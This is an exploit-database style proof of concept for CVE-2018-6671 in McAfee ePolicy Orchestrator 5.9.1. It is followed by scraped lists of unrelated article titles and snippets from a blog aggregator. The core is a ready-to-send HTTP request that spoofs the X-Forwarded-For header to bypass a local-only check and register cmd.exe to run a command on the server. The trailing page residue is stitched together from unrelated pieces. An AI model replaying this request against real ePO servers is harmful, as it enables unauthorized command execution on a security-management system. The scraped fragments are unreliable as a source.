# Exploit Title: McAfee ePO 5.9.1 Registered Executable Local Access Bypass

# Date: 2019-03-07

# Exploit Author: @leonjza

# Vendor Homepage: https://www.mcafee.com/

# Software Link: https://www.mcafee.com/enterprise/en-us/products/epolicy-orchestrator.html

# Version: ePO v5.9.1

# Tested on: Windows Server 2012

# CVE : cve-2018-6671

GIST LINK: https://gist.github.com/leonjza/17eb8ed9cba0ea1d2c70b82782c6d949

# CVE-2018-6671 McAfee ePO 5.9.1 Registered Executable Local Access Bypass

# Specifying an X-Forwarded-For header bypasses the local only check

# https://kc.mcafee.com/corporate/index?page=content&id=SB10240

# https://nvd.nist.gov/vuln/detail/CVE-2018-6671

#

# 2019 @leonjza

#

# Tested on ePO v5.9.1, missing hotfix EPO5xHF1229850

POST /Notifications/testRegExe.do HTTP/1.1

Host: 192.168.1.26:8443

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0)

Gecko/20100101 Firefox/66.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: https://192.168.1.26:8443/Notifications/addRegExecutable.do?orion.user.security.token=Bp5pZJOQll2vryhC

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Content-Length: 284

DNT: 1

Connection: close

Cookie: JSESSIONID=645BCB1CE5B7DBE1B9EDC7BB9F2F7349.route1;

orion.login.language="language:en&country:";

orion.content.size="width:1384&height:699";

JSESSIONIDSSO=4D970A5F2DBF48309F796DF38B80FC15

X-Forwarded-For: 127.0.0.1

orion.user.security.token=Bp5pZJOQll2vryhC&orion.user.security.token=Bp5pZJOQll2vryhC&executableName=CVE-2018-6671%20PoC&executablePath=c:\windows\system32\cmd.exe&userName=&pass=&passConfirm=&testExeArgs=/c

whoami > c:\CVE-2018-6671.txt&testExeTime=60000&objectId=0&ajaxMode=standard

--

L.

:wq!

[EXP]McAfee ePO 5.9.1 - Registered Executable Local Access Bypass的更多相关文章

  1. [EXP]Joomla! Component Easy Shop 1.2.3 - Local File Inclusion

    # Exploit Title: Joomla! Component Easy Shop - Local File Inclusion # Dork: N/A # Date: -- # Exploit ...

  2. metasploit-post模块信息

    Name                                             Disclosure Date  Rank    Description ----           ...

  3. Spark安装过程

    Precondition:jdk.Scala安装,/etc/profile文件部分内容如下: JAVA_HOME=/home/Spark/husor/jdk CLASSPATH=.:$JAVA_HOM ...

  4. mod_cluster启用https协议的步骤

    1.生成SSL证书与私钥 Generate Private Key on the Server Running Apache + mod_ssl First, generate a private k ...

  5. PostgreSQL导出一张表到MySQL

    1. 查看PostgreSQL表结构,数据量,是否有特殊字段值 region_il=# select count(*) from result_basic; count --------- ( row ...

  6. Ubuntu12.04 Bugzilla 和 TestOpia的安装步骤

    1.        安装apache User@ubuntu:$  sudo apt-get install apache2 注:安装完以后能够通过http://192.168.128.128/ 来訪 ...

  7. window7配置python3.3 + django + apache24 + mod_wsgi

    window7安装配置python3.3 + django + apache24 + mod_wsgi 1.下载版本的时候要对应 2.apache24 别放系统盘, 不然权限很麻烦 3.django ...

  8. DYNAMIC LINK LIBRARY - DLL

    https://www.tenouk.com/ModuleBB.html MODULE BB DYNAMIC LINK LIBRARY - DLL Part 1: STORY What do we h ...

  9. Apache 与 php的环境搭建

    Apache和PHP的版本分别为: httpd-2.4.9-win64-VC11.zip php-5.6.9-Win32-VC11-x64.zip 下载地址: php-5.6.9-Win32-VC11 ...

随机推荐

  1. jenkins+sonarQube代码质量扫描 并排除指定的目录

    sonar.projectKey=dev1-news-paymentsonar.projectName=dev1-news-paymentsonar.projectVersion=$BUILD_NUM ...

  2. 搭建中小规模集群之rsync数据同步备份

    NFS重要问题 1.有关NFS客户端普通用户写NFS的问题. 1)为什么要普通用户写NFS. 2)exports加all_squash. Rsync介绍 什么是Rsync? Rsync是一款开源的.快 ...

  3. 项目总结19:layui实现表格渲染、表格搜索、数据获取

    项目总结19:layui实现表格渲染.表格搜索.数据获取 1-参考资料:https://www.layui.com/demo/table/reload.html 2-本次总结的是layui的表格功能, ...

  4. nodejs+https 使用openssl (window)

    HTML的getUsermedia必是要安全的连接 比如 localhost.127.0.0.1 .https chrome才让调用摄像头 1.申请域名.备案.域名解析 2.openssl生成 打开g ...

  5. centos 7 命令行模式和桌面版之间的切换

    CentOS7图形界面与命令行界面切换 在图形界面使用 ctrl+alt+F2切换到dos界面 dos界面 ctrl+alt+F2切换回图形界面 在命令上 输入 init 命令 切换到dos界面 输入 ...

  6. ECMAscript,DOM,BOM哪个比较重要

    ECMA > DOM > BOM ECMA是JS的核心,语法.变量.对象.各种对象的API.作用域.原型链.闭包.This指向.构造函数等等必须要熟练,有了这些基础你才能去熟练的操作DOM ...

  7. AutoCAD开发1---获取块属性

    Private Sub CommandButton1_Click() Dim pEntity As AcadObject Dim pBlock As AcadBlockReference Dim pP ...

  8. java多线程系列9 高级同步工具(3) CyclicBarrier

    CyclicBarrier 一个同步辅助类,它允许一组线程互相等待,直到到达某个公共屏障点 (common barrier point)   然后一再执行 public class CyclicBar ...

  9. JavaScript:event loop详解

    之前已经有两篇随笔提到了event loop,一篇是事件机制,一篇是tasks和microtasks,但是里面的event loop都是文字描述,很难说细,逻辑也只是简单的提了一遍.其实之前也是通过阮 ...

  10. MySQL缓存参数优化(转)

    MySQL 数据库性能优化之缓存参数优化 数据库属于 IO 密集型的应用程序,其主要职责就是数据的管理及存储工作.而我们知道,从内存中读取一个数据库的时间是微秒级别,而从一块普通硬盘上读取一个IO是在 ...